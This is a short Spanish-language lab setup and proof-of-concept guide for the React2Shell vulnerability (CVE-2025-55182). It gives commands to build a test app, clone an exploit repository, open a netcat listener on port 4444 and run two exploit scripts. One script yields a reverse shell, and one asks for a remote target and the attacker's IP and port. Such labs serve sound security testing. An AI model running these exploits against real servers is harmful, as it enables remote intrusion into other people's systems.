
POC y configuración del laboratorio
POC y configuración del laboratorio
npm create [email protected] react2shell-lab
Aceptar los valores predeterminados está bien, ponle el nombre que quieras
git clone https://github.com/timsonner/React2Shell-CVE-2025-55182.git
npm install
cd react2shell-lab
npm run dev
nc -nlvp 4444
python3 react2shell-exploit-1.py
Este exploit es bueno para probar la configuración de localhost. Descomenta el otro payload para obtener una reverse shell...
python3 react2shell-exploit-2.py
Esta versión solicita al usuario el objetivo remoto y las IPs y puertos del atacante. El cuerpo de la petición (body_parts) también está ligeramente recortado en esta versión.
https://www.averlon.ai/blog/react2shell-cve-2025-55182-explained